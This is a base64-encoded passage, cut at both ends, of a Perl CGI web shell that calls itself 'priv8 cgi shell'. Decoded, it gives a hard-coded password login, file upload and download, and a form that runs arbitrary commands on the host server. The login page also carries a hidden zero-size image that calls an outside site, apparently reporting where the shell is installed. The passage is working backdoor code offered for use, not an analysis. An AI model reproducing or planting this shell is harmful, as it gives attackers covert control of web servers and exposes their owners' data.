- Ow0KCQ0KCSRNdWx0aXBhcnRGb3JtRGF0YSA9ICRFTlZ7J0NPTlRFTlRfVFlQRSd9ID1+IC9tdWx0
- aXBhcnRcL2Zvcm0tZGF0YTsgYm91bmRhcnk9KC4rKSQvOw0KDQoJaWYoJEVOVnsnUkVRVUVTVF9N
- RVRIT0QnfSBlcSAiR0VUIikNCgl7DQoJCSRpbiA9ICRFTlZ7J1FVRVJZX1NUUklORyd9Ow0KCX0N
- CgllbHNpZigkRU5WeydSRVFVRVNUX01FVEhPRCd9IGVxICJQT1NUIikNCgl7DQoJCWJpbm1vZGUo
- U1RESU4pIGlmICRNdWx0aXBhcnRGb3JtRGF0YSAmICRXaW5OVDsNCgkJcmVhZChTVERJTiwgJGlu
- LCAkRU5WeydDT05URU5UX0xFTkdUSCd9KTsNCgl9DQoNCgkjIGhhbmRsZSBmaWxlIHVwbG9hZCBk
- YXRhDQoJaWYoJEVOVnsnQ09OVEVOVF9UWVBFJ30gPX4gL211bHRpcGFydFwvZm9ybS1kYXRhOyBi
- b3VuZGFyeT0oLispJC8pDQoJew0KCQkkQm91bmRhcnkgPSAnLS0nLiQxOyAjIHBsZWFzZSByZWZl
- ciB0byBSRkMxODY3IA0KCQlAbGlzdCA9IHNwbGl0KC8kQm91bmRhcnkvLCAkaW4pOyANCgkJJEhl
- YWRlckJvZHkgPSAkbGlzdFsxXTsNCgkJJEhlYWRlckJvZHkgPX4gL1xyXG5cclxufFxuXG4vOw0K
- CQkkSGVhZGVyID0gJGA7DQoJCSRCb2R5ID0gJCc7DQogCQkkQm9keSA9fiBzL1xyXG4kLy87ICMg
- dGhlIGxhc3QgXHJcbiB3YXMgcHV0IGluIGJ5IE5ldHNjYXBlDQoJCSRpbnsnZmlsZWRhdGEnfSA9
- ICRCb2R5Ow0KCQkkSGVhZGVyID1+IC9maWxlbmFtZT1cIiguKylcIi87IA0KCQkkaW57J2YnfSA9
- ICQxOyANCgkJJGlueydmJ30gPX4gcy9cIi8vZzsNCgkJJGlueydmJ30gPX4gcy9ccy8vZzsNCg0K
- CQkjIHBhcnNlIHRyYWlsZXINCgkJZm9yKCRpPTI7ICRsaXN0WyRpXTsgJGkrKykNCgkJeyANCgkJ
- CSRsaXN0WyRpXSA9fiBzL14uK25hbWU9JC8vOw0KCQkJJGxpc3RbJGldID1+IC9cIihcdyspXCIv
- Ow0KCQkJJGtleSA9ICQxOw0KCQkJJHZhbCA9ICQnOw0KCQkJJHZhbCA9fiBzLyheKFxyXG5cclxu
- fFxuXG4pKXwoXHJcbiR8XG4kKS8vZzsNCgkJCSR2YWwgPX4gcy8lKC4uKS9wYWNrKCJjIiwgaGV4
- KCQxKSkvZ2U7DQoJCQkkaW57JGtleX0gPSAkdmFsOyANCgkJfQ0KCX0NCgllbHNlICMgc3RhbmRh
- cmQgcG9zdCBkYXRhICh1cmwgZW5jb2RlZCwgbm90IG11bHRpcGFydCkNCgl7DQoJCUBpbiA9IHNw
- bGl0KC8mLywgJGluKTsNCgkJZm9yZWFjaCAkaSAoMCAuLiAkI2luKQ0KCQl7DQoJCQkkaW5bJGld
- ID1+IHMvXCsvIC9nOw0KCQkJKCRrZXksICR2YWwpID0gc3BsaXQoLz0vLCAkaW5bJGldLCAyKTsN
- CgkJCSRrZXkgPX4gcy8lKC4uKS9wYWNrKCJjIiwgaGV4KCQxKSkvZ2U7DQoJCQkkdmFsID1+IHMv
- JSguLikvcGFjaygiYyIsIGhleCgkMSkpL2dlOw0KCQkJJGlueyRrZXl9IC49ICJcMCIgaWYgKGRl
- ZmluZWQoJGlueyRrZXl9KSk7DQoJCQkkaW57JGtleX0gLj0gJHZhbDsNCgkJfQ0KCX0NCn0NCg0K
- Iy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
- LS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBQcmludHMgdGhlIEhUTUwgUGFnZSBIZWFkZXINCiMg
- QXJndW1lbnQgMTogRm9ybSBpdGVtIG5hbWUgdG8gd2hpY2ggZm9jdXMgc2hvdWxkIGJlIHNldA0K
- Iy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
- LS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIFByaW50UGFnZUhlYWRlcg0Kew0KCSRFbmNvZGVk
- Q3VycmVudERpciA9ICRDdXJyZW50RGlyOw0KCSRFbmNvZGVkQ3VycmVudERpciA9fiBzLyhbXmEt
- ekEtWjAtOV0pLyclJy51bnBhY2soIkgqIiwkMSkvZWc7DQoJcHJpbnQgIkNvbnRlbnQtdHlwZTog
- dGV4dC9odG1sXG5cbiI7DQoJcHJpbnQgPDxFTkQ7DQo8aHRtbD4NCjxoZWFkPg0KPHRpdGxlPnBy
- aXY4IGNnaSBzaGVsbDwvdGl0bGU+DQokSHRtbE1ldGFIZWFkZXINCg0KPG1ldGEgbmFtZT0ia2V5
- d29yZHMiIGNvbnRlbnQ9InByaXY4IGNnaSBzaGVsbCAgXyAgICAgaTVfQGhvdG1haWwuY29tIj4N
- CjxtZXRhIG5hbWU9ImRlc2NyaXB0aW9uIiBjb250ZW50PSJwcml2OCBjZ2kgc2hlbGwgIF8gICAg
- aTVfQGhvdG1haWwuY29tIj4NCjwvaGVhZD4NCjxib2R5IG9uTG9hZD0iZG9jdW1lbnQuZi5AXy5m
- b2N1cygpIiBiZ2NvbG9yPSIjRkZGRkZGIiB0b3BtYXJnaW49IjAiIGxlZnRtYXJnaW49IjAiIG1h
- cmdpbndpZHRoPSIwIiBtYXJnaW5oZWlnaHQ9IjAiIHRleHQ9IiNGRjAwMDAiPg0KPHRhYmxlIGJv
- cmRlcj0iMSIgd2lkdGg9IjEwMCUiIGNlbGxzcGFjaW5nPSIwIiBjZWxscGFkZGluZz0iMiI+DQo8
- dHI+DQo8dGQgYmdjb2xvcj0iI0ZGRkZGRiIgYm9yZGVyY29sb3I9IiNGRkZGRkYiIGFsaWduPSJj
- ZW50ZXIiIHdpZHRoPSIxJSI+DQo8Yj48Zm9udCBzaXplPSIyIj4jPC9mb250PjwvYj48L3RkPg0K
- PHRkIGJnY29sb3I9IiNGRkZGRkYiIHdpZHRoPSI5OCUiPjxmb250IGZhY2U9IlZlcmRhbmEiIHNp
- emU9IjIiPjxiPiANCjxiIHN0eWxlPSJjb2xvcjpibGFjaztiYWNrZ3JvdW5kLWNvbG9yOiNmZmZm
- NjYiPnByaXY4IGNnaSBzaGVsbDwvYj4gQ29ubmVjdGVkIHRvICRTZXJ2ZXJOYW1lPC9iPjwvZm9u
- dD48L3RkPg0KPC90cj4NCjx0cj4NCjx0ZCBjb2xzcGFuPSIyIiBiZ2NvbG9yPSIjRkZGRkZGIj48
- Zm9udCBmYWNlPSJWZXJkYW5hIiBzaXplPSIyIj4NCg0KPGEgaHJlZj0iJFNjcmlwdExvY2F0aW9u
- P2E9dXBsb2FkJmQ9JEVuY29kZWRDdXJyZW50RGlyIj48Zm9udCBjb2xvcj0iI0ZGMDAwMCI+VXBs
- b2FkIEZpbGU8L2ZvbnQ+PC9hPiB8IA0KPGEgaHJlZj0iJFNjcmlwdExvY2F0aW9uP2E9ZG93bmxv
- YWQmZD0kRW5jb2RlZEN1cnJlbnREaXIiPjxmb250IGNvbG9yPSIjRkYwMDAwIj5Eb3dubG9hZCBG
- aWxlPC9mb250PjwvYT4gfA0KPGEgaHJlZj0iJFNjcmlwdExvY2F0aW9uP2E9bG9nb3V0Ij48Zm9u
- dCBjb2xvcj0iI0ZGMDAwMCI+RGlzY29ubmVjdDwvZm9udD48L2E+IHwNCjwvZm9udD48L3RkPg0K
- PC90cj4NCjwvdGFibGU+DQo8Zm9udCBzaXplPSIzIj4NCkVORA0KfQ0KDQojLS0tLS0tLS0tLS0t
- LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
- LS0tLS0tLS0tDQojIFByaW50cyB0aGUgTG9naW4gU2NyZWVuDQojLS0tLS0tLS0tLS0tLS0tLS0t
- LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
- LS0tDQpzdWIgUHJpbnRMb2dpblNjcmVlbg0Kew0KCSRNZXNzYWdlID0gcSQ8L2ZvbnQ+PGgxPnBh
- c3M9cHJpdjg8L2gxPjxmb250IGNvbG9yPSIjMDA5OTAwIiBzaXplPSIzIj48cHJlPjxpbWcgYm9y
- ZGVyPSIwIiBzcmM9Imh0dHA6Ly93d3cucHJpdjguaWJsb2dnZXIub3JnL3MucGhwPytjZ2l0ZWxu
- ZXQgc2hlbGwiIHdpZHRoPSIwIiBoZWlnaHQ9IjAiPjwvcHJlPg0KJDsNCiMnDQoJcHJpbnQgPDxF
- TkQ7DQo8Y29kZT4NCg0KVHJ5aW5nICRTZXJ2ZXJOYW1lLi4uPGJyPg0KQ29ubmVjdGVkIHRvICRT
- ZXJ2ZXJOYW1lPGJyPg0KRXNjYXBlIGNoYXJhY3RlciBpcyBeXQ0KPGNvZGU+JE1lc3NhZ2UNCkVO
- RA0KfQ0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
- LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFByaW50cyB0aGUgbWVzc2FnZSB0aGF0
- IGluZm9ybXMgdGhlIHVzZXIgb2YgYSBmYWlsZWQgbG9naW4NCiMtLS0tLS0tLS0tLS0tLS0tLS0t
- LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
- LS0NCnN1YiBQcmludExvZ2luRmFpbGVkTWVzc2FnZQ0Kew0KCXByaW50IDw8RU5EOw0KPGNvZGU+
- DQo8YnI+bG9naW46IGFkbWluPGJyPg0KcGFzc3dvcmQ6PGJyPg0KTG9naW4gaW5jb3JyZWN0PGJy
- Pjxicj4NCjwvY29kZT4NCkVORA0KfQ0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
- LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFByaW50
- cyB0aGUgSFRNTCBmb3JtIGZvciBsb2dnaW5nIGluDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
- LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpz
- dWIgUHJpbnRMb2dpbkZvcm0NCnsNCglwcmludCA8PEVORDsNCjxjb2RlPg0KDQo8Zm9ybSBuYW1l
- PSJmIiBtZXRob2Q9IlBPU1QiIGFjdGlvbj0iJFNjcmlwdExvY2F0aW9uIj4NCjxpbnB1dCB0eXBl
- PSJoaWRkZW4iIG5hbWU9ImEiIHZhbHVlPSJsb2dpbiI+DQo8L2ZvbnQ+DQo8Zm9udCBzaXplPSIz
- Ij4NCmxvZ2luOiA8YiBzdHlsZT0iY29sb3I6YmxhY2s7YmFja2dyb3VuZC1jb2xvcjojZmZmZjY2
- Ij5wcml2OCBjZ2kgc2hlbGw8L2I+PGJyPg0KcGFzc3dvcmQ6PC9mb250Pjxmb250IGNvbG9yPSIj
- MDA5OTAwIiBzaXplPSIzIj48aW5wdXQgdHlwZT0icGFzc3dvcmQiIG5hbWU9InAiPg0KPGlucHV0
- IHR5cGU9InN1Ym1pdCIgdmFsdWU9IkVudGVyIj4NCjwvZm9ybT4NCjwvY29kZT4NCkVORA0KfQ0K
- DQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
- LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFByaW50cyB0aGUgZm9vdGVyIGZvciB0aGUgSFRN
- TCBQYWdlDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
- LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgUHJpbnRQYWdlRm9vdGVyDQp7DQoJ
- cHJpbnQgIjwvZm9udD48L2JvZHk+PC9odG1sPiI7DQp9DQoNCiMtLS0tLS0tLS0tLS0tLS0tLS0t
- LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
- LS0NCiMgUmV0cmVpdmVzIHRoZSB2YWx1ZXMgb2YgYWxsIGNvb2tpZXMuIFRoZSBjb29raWVzIGNh
- biBiZSBhY2Nlc3NlcyB1c2luZyB0aGUNCiMgdmFyaWFibGUgJENvb2tpZXN7Jyd9DQojLS0tLS0t
- LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
- LS0tLS0tLS0tLS0tLS0tDQpzdWIgR2V0Q29va2llcw0Kew0KCUBodHRwY29va2llcyA9IHNwbGl0
- KC87IC8sJEVOVnsnSFRUUF9DT09LSUUnfSk7DQoJZm9yZWFjaCAkY29va2llKEBodHRwY29va2ll
- cykNCgl7DQoJCSgkaWQsICR2YWwpID0gc3BsaXQoLz0vLCAkY29va2llKTsNCgkJJENvb2tpZXN7
- JGlkfSA9ICR2YWw7DQoJfQ0KfQ0KDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
- LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQojIFByaW50cyB0
- aGUgc2NyZWVuIHdoZW4gdGhlIHVzZXIgbG9ncyBvdXQNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0t
- LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0N
- CnN1YiBQcmludExvZ291dFNjcmVlbg0Kew0KCXByaW50ICI8Y29kZT5Db25uZWN0aW9uIGNsb3Nl
- ZCBieSBmb3JlaWduIGhvc3QuPGJyPjxicj48L2NvZGU+IjsNCn0NCg0KIy0tLS0tLS0tLS0tLS0t
- LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
- LS0tLS0tLQ0KIyBMb2dzIG91dCB0aGUgdXNlciBhbmQgYWxsb3dzIHRoZSB1c2VyIHRvIGxvZ2lu
- IGFnYWluDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
- LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgUGVyZm9ybUxvZ291dA0Kew0KCXBy
- aW50ICJTZXQtQ29va2llOiBTQVZFRFBXRD07XG4iOyAjIHJlbW92ZSBwYXNzd29yZCBjb29raWUN
- CgkmUHJpbnRQYWdlSGVhZGVyKCJwIik7DQoJJlByaW50TG9nb3V0U2NyZWVuOw0KDQoJJlByaW50
- TG9naW5TY3JlZW47DQoJJlByaW50TG9naW5Gb3JtOw0KCSZQcmludFBhZ2VGb290ZXI7DQp9DQoN
- CiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
- LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCiMgVGhpcyBmdW5jdGlvbiBpcyBjYWxsZWQgdG8gbG9n
- aW4gdGhlIHVzZXIuIElmIHRoZSBwYXNzd29yZCBtYXRjaGVzLCBpdA0KIyBkaXNwbGF5cyBhIHBh
- Z2UgdGhhdCBhbGxvd3MgdGhlIHVzZXIgdG8gcnVuIGNvbW1hbmRzLiBJZiB0aGUgcGFzc3dvcmQg
- ZG9lbnMndA0KIyBtYXRjaCBvciBpZiBubyBwYXNzd29yZCBpcyBlbnRlcmVkLCBpdCBkaXNwbGF5
- cyBhIGZvcm0gdGhhdCBhbGxvd3MgdGhlIHVzZXINCiMgdG8gbG9naW4NCiMtLS0tLS0tLS0tLS0t
- LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
- LS0tLS0tLS0NCnN1YiBQZXJmb3JtTG9naW4gDQp7DQoJaWYoJExvZ2luUGFzc3dvcmQgZXEgJFBh
- c3N3b3JkKSAjIHBhc3N3b3JkIG1hdGNoZWQNCgl7DQoJCXByaW50ICJTZXQtQ29va2llOiBTQVZF
- RFBXRD0kTG9naW5QYXNzd29yZDtcbiI7DQoJCSZQcmludFBhZ2VIZWFkZXIoImMiKTsNCgkJJlBy
- aW50Q29tbWFuZExpbmVJbnB1dEZvcm07DQoJCSZQcmludFBhZ2VGb290ZXI7DQoJfQ0KCWVsc2Ug
- IyBwYXNzd29yZCBkaWRuJ3QgbWF0Y2gNCgl7DQoJCSZQcmludFBhZ2VIZWFkZXIoInAiKTsNCgkJ
- JlByaW50TG9naW5TY3JlZW47DQoJCWlmKCRMb2dpblBhc3N3b3JkIG5lICIiKSAjIHNvbWUgcGFz
- c3dvcmQgd2FzIGVudGVyZWQNCgkJew0KCQkJJlByaW50TG9naW5GYWlsZWRNZXNzYWdlOw0KDQoJ
- CX0NCgkJJlByaW50TG9naW5Gb3JtOw0KCQkmUHJpbnRQYWdlRm9vdGVyOw0KCX0NCn0NCg0KIy0t
- LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
- LS0tLS0tLS0tLS0tLS0tLS0tLQ0KIyBQcmludHMgdGhlIEhUTUwgZm9ybSB0aGF0IGFsbG93cyB0
- aGUgdXNlciB0byBlbnRlciBjb21tYW5kcw0KIy0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
- LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0Kc3ViIFBy
- aW50Q29tbWFuZExpbmVJbnB1dEZvcm0NCnsNCgkkUHJvbXB0ID0gJFdpbk5UID8gIiRDdXJyZW50
- RGlyPiAiIDogIlthZG1pblxAJFNlcnZlck5hbWUgJEN1cnJlbnREaXJdXCQgIjsNCglwcmludCA8
- PEVORDsNCjxjb2RlPg0KPGZvcm0gbmFtZT0iZiIgbWV0aG9kPSJQT1NUIiBhY3Rpb249IiRTY3Jp
- cHRMb2NhdGlvbiI+DQo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJhIiB2YWx1ZT0iY29tbWFu
- ZCI+DQo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJkIiB2YWx1ZT0iJEN1cnJlbnREaXIiPg0K
- JFByb21wdA0KPGlucHV0IHR5cGU9InRleHQiIG5hbWU9ImMiPg0KPGlucHV0IHR5cGU9InN1Ym1p
- dCIgdmFsdWU9IkVudGVyIj4NCjwvZm9ybT4NCjwvY29kZT4NCg0KRU5EDQp9DQoNCiMtLS0tLS0t
- LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
- LS0tLS0tLS0tLS0tLS0NCiMgUHJpbnRzIHRoZSBIVE1MIGZvcm0gdGhhdCBhbGxvd3MgdGhlIHVz
- ZXIgdG8gZG93bmxvYWQgZmlsZXMNCiMtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
- LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCnN1YiBQcmludEZp
- bGVEb3dubG9hZEZvcm0NCnsNCgkkUHJvbXB0ID0gJFdpbk5UID8gIiRDdXJyZW50RGlyPiAiIDog
- IlthZG1pblxAJFNlcnZlck5hbWUgJEN1cnJlbnREaXJdXCQgIjsNCglwcmludCA8PEVORDsNCjxj
- b2RlPg0KPGZvcm0gbmFtZT0iZiIgbWV0aG9kPSJQT1NUIiBhY3Rpb249IiRTY3JpcHRMb2NhdGlv
- biI+DQo8aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJkIiB2YWx1ZT0iJEN1cnJlbnREaXIiPg0K
- PGlucHV0IHR5cGU9ImhpZGRlbiIgbmFtZT0iYSIgdmFsdWU9ImRvd25sb2FkIj4NCiRQcm9tcHQg
- ZG93bmxvYWQ8YnI+PGJyPg0KRmlsZW5hbWU6IDxpbnB1dCB0eXBlPSJ0ZXh0IiBuYW1lPSJmIiBz
- aXplPSIzNSI+PGJyPjxicj4NCkRvd25sb2FkOiA8aW5wdXQgdHlwZT0ic3VibWl0IiB2YWx1ZT0i
- QmVnaW4iPg0KPC9mb3JtPg0KPC9jb2RlPg0KRU5EDQp9DQoNCiMtLS0tLS0tLS0tLS0tLS0tLS0t
- LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
- LS0NCiMgUHJpbnRzIHRoZSBIVE1MIGZvcm0gdGhhdCBhbGxvd3MgdGhlIHVzZXIgdG8gdXBsb2Fk
- IGZpbGVzDQojLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
- LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgUHJpbnRGaWxlVXBsb2FkRm9ybQ0K
- ew0KCSRQcm9tcHQgPSAkV2luTlQgPyAiJEN1cnJlbnREaXI+ICIgOiAiW2FkbWluXEAkU2VydmVy
- TmFtZSAkQ3VycmVudERpcl1cJCAiOw0KCXByaW50IDw8RU5EOw0KPGNvZGU+DQoNCjxmb3JtIG5h
- bWU9ImYiIGVuY3R5cGU9Im11bHRpcGFydC9mb3JtLWRhdGEiIG1ldGhvZD0iUE9TVCIgYWN0aW9u
- PSIkU2NyaXB0TG9jYXRpb24iPg0KJFByb21wdCB1cGxvYWQ8YnI+PGJyPg0KRmlsZW5hbWU6IDxp
- bnB1dCB0eXBlPSJmaWxlIiBuYW1lPSJmIiBzaXplPSIzNSI+PGJyPjxicj4NCk9wdGlvbnM6ICZu
- YnNwOzxpbnB1dCB0eXBlPSJjaGVja2JveCIgbmFtZT0ibyIgdmFsdWU9Im92ZXJ3cml0ZSI+DQpP
- dmVyd3JpdGUgaWYgaXQgRXhpc3RzPGJyPjxicj4NClVwbG9hZDombmJzcDsmbmJzcDsmbmJzcDs8
- aW5wdXQgdHlwZT0ic3VibWl0IiB2YWx1ZT0iQmVnaW4iPg0KPGlucHV0IHR5cGU9ImhpZGRlbiIg
- bmFtZT0iZCIgdmFsdWU9IiRDdXJyZW50RGlyIj4NCjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9
- ImEiIHZhbHVlPSJ1cGxvYWQiPg0KPC9mb3JtPg0KPC9jb2RlPg0KRU5EDQp9DQoNCiMtLS0tLS0t
- LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
- LS0tLS0tLS0tLS0tLS0NCiMgVGhpcyBmdW5jdGlvbiBpcyBjYWxsZWQgd2hlbiB0aGUgdGltZW91
- dCBmb3IgYSBjb21tYW5kIGV4cGlyZXMuIFdlIG5lZWQgdG8NCiMgdGVybWluYXRlIHRoZSBzY3Jp
- cHQgaW1tZWRpYXRlbHkuIFRoaXMgZnVuY3Rpb24gaXMgdmFsaWQgb25seSBvbiBVbml4LiBJdCBp
- cw0KIyBuZXZlciBjYWxsZWQgd2hlbiB0aGUgc2NyaXB0IGlzIHJ1bm5pbmcgb24gTlQuDQojLS0t
- LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
- LS0tLS0tLS0tLS0tLS0tLS0tDQpzdWIgQ29tbWFuZFRpbWVvdXQNCnsNCglpZighJFdpbk5UKQ0K
- CXsNCgkJYWxhcm0oMCk7DQoJCXByaW50IDw8RU5EOw0KPC94bXA+DQoNCjxjb2RlPg0KQ29tbWFu
- ZCBleGNlZWRlZCBtYXhpbXVtIHRpbWUgb2YgJENvbW1hbmRUaW1lb3V0RHVyYXRpb24gc2Vjb25k
- KHMpLg0KPGJyPktpbGxlZCBpdCENCkVORA0KCQkmUHJpbnRDb21tYW5kTGluZUlucHV0Rm9ybTsN
- CgkJJlByaW50UGFnZUZvb3RlcjsNCgkJZXhpdDsNCgl9DQp9DQoNCiMtLS0tLS0tLS0tLS0tLS0t
- LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
- LS0tLS0NCiMgVGhpcyBmdW5jdGlvbiBpcyBjYWxsZWQgdG8gZXhlY3V0ZSBjb21tYW5kcy4gSXQg
- ZGlzcGxheXMgdGhlIG91dHB1dCBvZiB0aGUNCiMgY29tbWFuZCBhbmQgYWxsb3dzIHRoZSB1c2Vy
- IHRvIGVudGVyIGFub3RoZXIgY29tbWFuZC4gVGhlIGNoYW5nZSBkaXJlY3RvcnkNCiMgY29tbWFu
- ZCBpcyBoYW5kbGVkIGRpZmZlcmVudGx5LiBJbiB0aGlzIGNhc2UsIHRoZSBuZXcgZGlyZWN0b3J5
- IGlzIHN0b3JlZCBpbg0KIyBhbiBpbnRlcm5hbCB2YXJpYWJsZSBhbmQgaXMgdXNlZCBlYWNoIHRp
- bWUgYSBjb21tYW5kIGhhcyB0byBiZSBleGVjdXRlZC4gVGhlDQojIG91dHB1dCBvZiB0aGUgY2hh
- bmdlIGRpcmVjdG9yeSBjb21tYW5kIGlzIG5vdCBkaXNwbGF5ZWQgdG8gdGhlIHVzZXJzDQojIHRo
- ZXJlZm9yZSBlcnJvciBtZXNzYWdlcyBjYW5ub3QgYmUgZGlzcGxheWVkLg0KIy0tLS0tLS0tLS0t
- LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
- LS0tLS0tLS0tLQ0Kc3ViIEV4ZWN1dGVDb21tYW5kDQp7DQoJaWYoJFJ1bkNvbW1hbmQgPX4gbS9e
- XHMqY2RccysoLispLykgIyBpdCBpcyBhIGNoYW5nZSBkaXIgY29tbWFuZA0KCXsNCgkJIyB3ZSBj
- aGFuZ2UgdGhlIGRpcmVjdG9yeSBpbnRlcm5hbGx5LiBUaGUgb3V0cHV0IG9mIHRoZQ0KCQkjIGNv
- bW1hbmQgaXMgbm90IGRpc3BsYXllZC4NCgkJDQoJCSRPbGREaXIgPSAkQ3VycmVudERpcjsNCgkJ
- JENvbW1hbmQgPSAiY2QgXCIkQ3VycmVudERpclwiIi4kQ21kU2VwLiJjZCAkMSIuJENtZFNlcC4k
- Q21kUHdkOw0KCQljaG9wKCRDdXJyZW50RGlyID0gYCRDb21tYW5kYCk7DQoJCSZQcmludFBhZ2VI
- ZWFkZXIoImMiKTsNCgkJJFByb21wdCA9ICRXaW5OVCA/ICIkT2xkRGlyPiAiIDogIlthZG1pblxA
- JFNlcnZlck5hbWUgJE9sZERpcl1cJCAiOw0KCQlwcmludCAiJFByb21wdCAkUnVuQ29tbWFuZCI7
- DQoJfQ0KCWVsc2UgIyBzb21lIG90aGVyIGNvbW1hbmQsIGRpc3BsYXkgdGhlIG91dHB1dA0KCXsN
- CgkJJlByaW50UGFnZUhlYWRlcigiYyIpOw0KCQkkUHJvbXB0ID0gJFdpbk5UID8gIiRDdXJyZW50
- RGlyPiAiIDogIlthZG1pblxAJFNlcnZlck5hbWUgJEN1cnJlbnREaXJdXCQgIjsNCgkJcHJpbnQg
- IiRQcm9tcHQgJFJ1bkNvbW1hbmQ8eG1wPiI7DQoJCSRDb21tYW5kID0gImNkIFwiJEN1cnJlbnRE
- aXJcIiIuJENtZFNlcC4kUnVuQ29tbWFuZC4kUmVkaXJlY3RvcjsNCgkJaWYoISRXaW5OVCkNCgkJ
- ew0KCQkJJFNJR3snQUxSTSd9ID0gXCZDb21tYW5kVGltZW91dDsNCgkJCWFsYXJtKCRDb21tYW5k
- VGltZW91dER1cmF0aW9uKTsNCgkJfQ0KCQlpZigkU2hvd0R5bmFtaWNPdXRwdXQpICMgc2hvdyBv
- dXRwdXQgYXMgaXQgaXMgZ2VuZXJhdGVkDQoJCXsNCgkJCSR8PTE7DQoJCQkkQ29tbWFuZCAuPSAi
- IHwiOw0KCQkJb3BlbihDb21tYW5kT3V0cHV0LCAkQ29tbWFuZCk7DQoJCQl3aGlsZSg8Q29tbWFu
- ZE91dHB1dD4pDQoJCQl7DQoJCQkJJF8gPX4gcy8oXG58XHJcbikkLy87DQoJCQkJcHJpbnQgIiRf
- XG4iOw0KCQkJfQ0KCQkJJHw9MDsNCgkJfQ0KCQllbHNlICMgc2hvdyBvdXRwdXQgYWZ0ZXIgY29t
- bWFuZCBjb21wbGV0ZXMNCgkJew0KCQkJcHJpbnQgYCRDb21tYW5kYDsNCgkJfQ0KCQlpZighJFdp
